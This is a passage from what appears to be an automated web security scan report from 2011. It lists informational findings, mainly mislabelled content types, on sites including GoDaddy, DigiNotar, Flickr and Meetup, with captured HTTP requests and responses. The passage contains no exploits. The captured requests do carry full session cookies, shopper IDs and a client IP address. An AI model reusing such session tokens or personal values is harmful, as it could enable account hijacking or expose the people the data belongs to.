User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Sat, 03 Sep 2011 21:30:29 GMT
Connection: close
Content-Length: 349

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1314814617-3398750%7cMUI
...[SNIP]...

26.25. http://www.godaddy.com/sso/keepalive.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.godaddy.com
Path:	/sso/keepalive.aspx

Request

GET /sso/keepalive.aspx?rand=143210 HTTP/1.1
Host: www.godaddy.com
Proxy-Connection: keep-alive
Referer: http://www.godaddy.com/gdshop/offers/cross_sell.asp?ci=42031&config=ssldefault
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=hjhwaz45up3pxz55cnrxsi55; ASPSESSIONIDACSTCQTS=OBJPAOKANJKKAGECLEBMBEIM; preferences1=_sid=&dataCenterCode=US&gdshop_currencyType=USD; flag1=cflag=us; currencypopin1=cdisplaypopin=false; SplitValue1=24; BlueLithium_ssl=dbdflblbdeidccshddredcccjfvazaii; GoogleADServicesgooglessl=dbdflblbdeidccshddredcccjfvazaii; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; pathway=8d587be0-834e-4a03-83dc-2f3bcb783a40; pagecount=1; actioncount=; app_pathway=; visitor=vid=8d587be0-834e-4a03-83dc-2f3bcb783a40; adc1=US; currency1=potableSourceStr=USD; ShopperId1=yjjjodldcfygaahhseaipjhbleigjbpa; domainYardVal=%2D1; serverVersion=A; traffic=referringdomain=&referringpath=8d587be0%2D834e%2D4a03%2D83dc%2D2f3bcb783a40&shopper=46215684&querystring=ci%3D42031%26config%3Dssldefault&server=M1PWCORPWEB109&isc=&privatelabelid=1&page=%2Fgdshop%2Foffers%2Fcross%5Fsell%2Easp&sitename=www%2Egodaddy%2Ecom&clientip=50%2E23%2E123%2E106&status=200+OK&referrer=http%3A%2F%2Fwww%2Egodaddy%2Ecom%2Fssl%2Fssl%2Dcertificates%2Easpx%3Fci%3D8346&cookies=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sat, 03 Sep 2011 21:45:38 GMT
Content-Length: 43

GIF89a.............!.......,...........D..;

26.26. http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.hostnj.net
Path:	/products-page/ssl-security/comodo-intranet-ssl-certificate/index.php

Request

POST /products-page/ssl-security/comodo-intranet-ssl-certificate/index.php?ajax=true HTTP/1.1
Host: www.hostnj.net
Proxy-Connection: keep-alive
Referer: http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/
Content-Length: 42
Origin: http://www.hostnj.net
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=0c4jdvo08lk3se1ijpreg0j3o3; __switchTo5x=72; __qca=P0-1742493612-1315085426300; __unam=c6276e8-13231331aee-5ff43484-3; __utma=214552206.1055042161.1315085425.1315085425.1315085425.1; __utmb=214552206.3.10.1315085425; __utmc=214552206; __utmz=214552206.1315085425.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ssl%20certificates

wpsc_ajax_action=add_to_cart&product_id=58

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Powered-By: ASP.NET
Date: Sat, 03 Sep 2011 21:42:20 GMT
Content-Length: 2729

if(jQuery('#fancy_notification_content')) {
jQuery('#fancy_notification_content').html("<span>You just added \"Comodo Intranet SSL Certificate\" to your cart.</span><br /><a href=\'http://www.host
...[SNIP]...

26.27. https://www.sslmatrix.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.sslmatrix.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.sslmatrix.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=sbarsdjyp5j2be55zav4bkbo

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 00:26:13 GMT
Content-Length: 2775

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">

...[SNIP]...

27. Content type incorrectly stated previous next
There are 54 instances of this issue:

http://api.twitter.com/1/urls/resolve.json
http://api.twitter.com/1/users/search.json
http://api.twitter.com/i/search/image_facets.json
http://api.twitter.com/i/search/video_facets.json
http://diginotar.nl/Default.aspx
http://farm6.static.flickr.com/clientaccesspolicy.xml
http://farm6.static.flickr.com/crossdomain.xml
http://farm7.static.flickr.com/clientaccesspolicy.xml
http://feeds.feedburner.com/~s/meetup
http://img1.meetupstatic.com/39194172310009655/img/noPhoto_50.gif
http://img1.meetupstatic.com/photos/event/2/c/b/b/highres_36191451.jpeg
http://img1.meetupstatic.com/photos/event/6/e/b/highres_45241771.jpeg
http://img1.meetupstatic.com/photos/event/9/9/8/5/highres_32139301.jpeg
http://img2.meetupstatic.com/photos/event/9/c/2/3/highres_39819971.jpeg
http://img2.meetupstatic.com/photos/event/a/5/e/7/highres_43722471.jpeg
http://microsoftcambridge.com/Portals/0/teams/sharepoint_inline.png
http://microsoftcambridge.com/favicon.ico
http://microsoftcambridge.com/slideshow/Vertigo.small.xap
http://now.eloqua.com/visitor/v200/svrGP.aspx
http://omnituremarketing.tt.omtrdc.net/m2/omnituremarketing/mbox/standard
https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Annuleren.png
https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Volgende.png
https://onlineaanvraag.diginotar.nl/DigiForms/images/buttons/English/Vorige.png
http://photos1.meetupstatic.com/photos/event/2/8/a/0/thumb_22990400.jpeg
http://photos1.meetupstatic.com/photos/event/a/0/9/5/highres_9821109.jpeg
http://photos1.meetupstatic.com/photos/member/3/2/3/0/thumb_11052848.jpeg
http://photos2.meetupstatic.com/photos/event/9/1/d/e/thumb_10177342.jpeg
http://photos2.meetupstatic.com/photos/event/a/1/9/a/highres_9821370.jpeg
http://photos2.meetupstatic.com/photos/member/7/6/d/8/thumb_1590424.jpeg
http://photos2.meetupstatic.com/photos/member/a/e/2/9/thumb_9884585.jpeg
http://photos3.meetupstatic.com/photos/event/a/0/9/4/highres_9821108.jpeg
http://photos3.meetupstatic.com/photos/member/1/3/0/f/thumb_11344879.jpeg
http://photos3.meetupstatic.com/photos/member/1/d/6/1/thumb_18127521.jpeg
http://photos3.meetupstatic.com/photos/member/7/e/a/1/thumb_12752417.jpeg
http://photos4.meetupstatic.com/photos/event/a/0/9/6/highres_9821110.jpeg
http://photos4.meetupstatic.com/photos/member/2/7/2/f/thumb_20650031.jpeg
http://research.microsoft.com/en-us/um/people/helenw/papers/fullMashupOS.pptx
http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/plas07.pptx
http://research.microsoft.com/en-us/um/people/livshits/papers/ppt/w2sp10.pptx
http://scripts.omniture.com/global/scripts/targeting/dyn_prop.php
http://search.twitter.com/search.json
http://survey.112.2o7.net/survey/dynamic/suites/276/omniturecom-2011/list.js
http://twitter.com/account/available_features
http://vasco.com/app_pages/getDCP.aspx
http://www.godaddy.com/sso/keepalive.aspx
http://www.google.com/search
http://www.hostnj.net/products-page/ssl-security/comodo-intranet-ssl-certificate/index.php
http://www.meetup.com/api/
http://www.microcad.ca/livezilla/images/carrier_logo.gif
http://www.microsoft-careers.com/model/remote/remoteTrackingManager.cfc
http://www.microsoft-careers.com/model/remote/remotejobManager.cfc
http://www.omniture.com/listener.html
http://www.register.com/font/vag-bold.ttf
http://www.register.com/font/vag-bold.woff

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

27.1. http://api.twitter.com/1/urls/resolve.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/urls/resolve.json

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

Response

27.2. http://api.twitter.com/1/users/search.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/1/users/search.json

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

Response

27.3. http://api.twitter.com/i/search/image_facets.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/i/search/image_facets.json

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

Response

27.4. http://api.twitter.com/i/search/video_facets.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://api.twitter.com
Path:	/i/search/video_facets.json

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json; charset=utf-8

The response states that it contains JSON. However, it actually appears to contain plain text.

Request

Response

27.5. http://diginotar.nl/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://diginotar.nl
Path:	/Default.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=utf-8

The response states that it contains plain text. However, it actually appears to contain script.

Request

POST /Default.aspx HTTP/1.1
Host: diginotar.nl
Proxy-Connection: keep-alive
Referer: http://diginotar.nl/
Content-Length: 8377
Origin: http://diginotar.nl
Cache-Control: no-cache
X-MicrosoftAjax: Delta=true
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: .ASPXANONYMOUS=GkxP6RGhzAEkAAAANjA0ZTQzNjItYThjYi00YzIyLThkNmItYmE0MzhkMWNhYjI00; language=nl-NL; __utma=73892103.1325282259.1315085212.1315085212.1315085212.1; __utmb=73892103.1.10.1315085212; __utmc=73892103; __utmz=73892103.1315085212.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

ScriptManager=dnn%24ctr2083%24Links_UP%7Cdnn%24ctr2083%24Links%24cmdGo&__EVENTTARGET=dnn%24ctr2083%24Links%24cmdGo&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwULLTE2NDIyOTEzMjkPZBYGZg8WAh4EVGV4dAV5PCFET0NUWV
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Sat, 03 Sep 2011 21:27:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: language=nl-NL; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/plain; charset=utf-8
Content-Length: 80

62|pageRedirect||http://diginotar.nl/LinkClick.aspx?link=331&tabid=209&mid=2083|

27.6. http://farm6.static.flickr.com/clientaccesspolicy.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://farm6.static.flickr.com
Path:	/clientaccesspolicy.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: farm6.static.flickr.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=akv59u57649m0&b=3&s=r4; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 13:08:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Fri, 06 May 2011 18:47:17 GMT
X-Cache: MISS from photocache624.flickr.gq1.yahoo.com
X-Cache-Lookup: MISS from photocache624.flickr.gq1.yahoo.com:83
Via: 1.1 photocache624.flickr.gq1.yahoo.com:83 (squid/2.7.STABLE9)
Content-Length: 31

photocache624.flickr.gq1 : 404

27.7. http://farm6.static.flickr.com/crossdomain.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://farm6.static.flickr.com
Path:	/crossdomain.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain XML.

Request

GET /crossdomain.xml HTTP/1.1
Host: farm6.static.flickr.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=akv59u57649m0&b=3&s=r4; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 03 Sep 2011 13:08:24 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Fri, 06 May 2011 16:24:59 GMT
Connection: keep-alive
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...

27.8. http://farm7.static.flickr.com/clientaccesspolicy.xml previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://farm7.static.flickr.com
Path:	/clientaccesspolicy.xml

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=ISO-8859-1

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /clientaccesspolicy.xml HTTP/1.1
Host: farm7.static.flickr.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=akv59u57649m0&b=3&s=r4; localization=en-us%3Bus%3Bus

Response

HTTP/1.1 404 Not Found
Date: Sat, 03 Sep 2011 13:08:18 GMT
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Last-Modified: Tue, 14 Jun 2011 21:31:09 GMT
X-Cache: MISS from photocache715.flickr.ne1.yahoo.com
X-Cache-Lookup: MISS from photocache715.flickr.ne1.yahoo.com:85
Via: 1.1 photocache715.flickr.ne1.yahoo.com:85 (squid/2.7.STABLE9)
Content-Length: 31

photocache715.flickr.ne1 : 404

27.9. http://feeds.feedburner.com/~s/meetup previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://feeds.feedburner.com
Path:	/~s/meetup

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /~s/meetup?i=http%3A//meetupblog.meetup.com/2011/08/new-place-to-run.html&showad=true HTTP/1.1
Host: feeds.feedburner.com
Proxy-Connection: keep-alive
Referer: http://meetupblog.meetup.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=UTF-8
Date: Sat, 03 Sep 2011 13:12:27 GMT
Expires: Sat, 03 Sep 2011 13:12:27 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 4
Server: GSE

null

27.10. http://img1.meetupstatic.com/39194172310009655/img/noPhoto_50.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://img1.meetupstatic.com
Path:	/39194172310009655/img/noPhoto_50.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /39194172310009655/img/noPhoto_50.gif HTTP/1.1
Host: img1.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/Boston-BizSpark-Meetup/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Accept-Ranges: bytes
ETag: "4253729860"
Last-Modified: Wed, 03 Jun 2009 03:22:37 GMT
Content-Length: 1942
Server: lighttpd/1.4.20
Cache-Control: max-age=5490038
Expires: Sun, 06 Nov 2011 02:12:17 GMT
Date: Sat, 03 Sep 2011 13:11:39 GMT
Connection: close

.PNG
.
...IHDR...2...2......?......sBIT....|.d.... pHYs...........~.....tEXtSoftware.Adobe Fireworks CS3..F.....tEXtCreation Time.12/9/08.3.P....IDATh..._l[W.......IZ\..J..e.f...e..J..iHC.C.!1...@+
...[SNIP]...

27.11. http://img1.meetupstatic.com/photos/event/2/c/b/b/highres_36191451.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://img1.meetupstatic.com
Path:	/photos/event/2/c/b/b/highres_36191451.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/event/2/c/b/b/highres_36191451.jpeg HTTP/1.1
Host: img1.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/whats_new/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 18346
Cache-Control: max-age=25516940
Expires: Sun, 24 Jun 2012 21:14:19 GMT
Date: Sat, 03 Sep 2011 13:11:59 GMT
Connection: close

.PNG
.
...IHDR.......d........... pHYs...H...H.F.k>... vpAg.......d...wG..G.IDATx...w.]U.?.........e&.w.B ....rA..kA...."........t..I..RH..d&..Oo...~..0.g......g.SvYg}..../..e1.........$..%Q._.wl.
...[SNIP]...

27.12. http://img1.meetupstatic.com/photos/event/6/e/b/highres_45241771.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://img1.meetupstatic.com
Path:	/photos/event/6/e/b/highres_45241771.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/event/6/e/b/highres_45241771.jpeg HTTP/1.1
Host: img1.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/whats_new/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 19751
Cache-Control: max-age=28436612
Expires: Sat, 28 Jul 2012 16:15:31 GMT
Date: Sat, 03 Sep 2011 13:11:59 GMT
Connection: close

.PNG
.
...IHDR.......d........... pHYs...H...H.F.k>... vpAg.......d...wG..L.IDATx...g.eIv.......I.3+...|UW.w3...&...!)J4.....J..Z@....~,!P...r!...E...k.i7...|eV..........?^VVV...&....H....q..8....R
...[SNIP]...

27.13. http://img1.meetupstatic.com/photos/event/9/9/8/5/highres_32139301.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://img1.meetupstatic.com
Path:	/photos/event/9/9/8/5/highres_32139301.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/event/9/9/8/5/highres_32139301.jpeg HTTP/1.1
Host: img1.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/whats_new/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 27489
Cache-Control: max-age=24144659
Expires: Sat, 09 Jun 2012 00:02:58 GMT
Date: Sat, 03 Sep 2011 13:11:59 GMT
Connection: close

.PNG
.
...IHDR.......d........... pHYs...H...H.F.k>... vpAg.......d...wG..j.IDATx...w.d.u........:....... ..f."%Z9....e...g..:\]I~~....,..r..M..H."%1..H..........9V..vz..N3.}...]Su....J..[k...-c.
...[SNIP]...

27.14. http://img2.meetupstatic.com/photos/event/9/c/2/3/highres_39819971.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://img2.meetupstatic.com
Path:	/photos/event/9/c/2/3/highres_39819971.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/event/9/c/2/3/highres_39819971.jpeg HTTP/1.1
Host: img2.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/whats_new/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 13832
Cache-Control: max-age=26628788
Expires: Sat, 07 Jul 2012 18:05:07 GMT
Date: Sat, 03 Sep 2011 13:11:59 GMT
Connection: close

.PNG
.
...IHDR.......d........... pHYs...H...H.F.k>... vpAg.......d...wG..5wIDATx...y...y7..[.....Lkvi...6......`.c..>Ll.; ._'..8.rrN.7~........c;oL...|8.`..!@.......f4..Y.{..k...~.h,....3.....3..
...[SNIP]...

27.15. http://img2.meetupstatic.com/photos/event/a/5/e/7/highres_43722471.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://img2.meetupstatic.com
Path:	/photos/event/a/5/e/7/highres_43722471.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /photos/event/a/5/e/7/highres_43722471.jpeg HTTP/1.1
Host: img2.meetupstatic.com
Proxy-Connection: keep-alive
Referer: http://www.meetup.com/whats_new/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/jpeg
Server: lighttpd/1.4.20
Content-Length: 14675
Cache-Control: max-age=27938785
Expires: Sun, 22 Jul 2012 21:58:24 GMT
Date: Sat, 03 Sep 2011 13:11:59 GMT
Connection: close

.PNG
.
...IHDR.......d......r......bKGD............. pHYs...........~.... vpAg.......d...wG..8.IDATx...w..u...O.^vv.ov.=.....D...=E!.. .....gW.(w...P....)..Z. .u...mf.=3O.?fg3.v7@....z.kfgg......}.
...[SNIP]...

27.16. http://microsoftcambridge.com/Portals/0/teams/sharepoint_inline.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://microsoftcambridge.com
Path:	/Portals/0/teams/sharepoint_inline.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a JPEG image.

Request

GET /Portals/0/teams/sharepoint_inline.png HTTP/1.1
Host: microsoftcambridge.com
Proxy-Connection: keep-alive
Referer: http://microsoftcambridge.com/Teams/tabid/55/Default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-nbhajkek=A3C0DAFD2501960491DB6D8BB4AF78CD; .ASPXANONYMOUS=RwXpWsygzAEkAAAANDBmYzBmNzItYTVjZi00ZjUxLTlhMWEtODkxYzlhOWM2NDQ40; X-Mapping-pfddgonl=29291CB50178807E04EE211C8DF8D85B; language=en-US

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: image/png
Date: Sat, 03 Sep 2011 13:10:16 GMT
Accept-Ranges: bytes
Connection: Keep-Alive
Last-Modified: Mon, 28 Jun 2010 17:34:13 GMT
X-Cache-Info: caching
Content-Length: 19715

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

27.17. http://microsoftcambridge.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://microsoftcambridge.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/)
Host: microsoftcambridge.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Sat, 03 Sep 2011 13:04:37 GMT
Accept-Ranges: bytes
Last-Modified: Thu, 12 Feb 2009 05:02:14 GMT
Content-Length: 3638
Connection: Keep-Alive
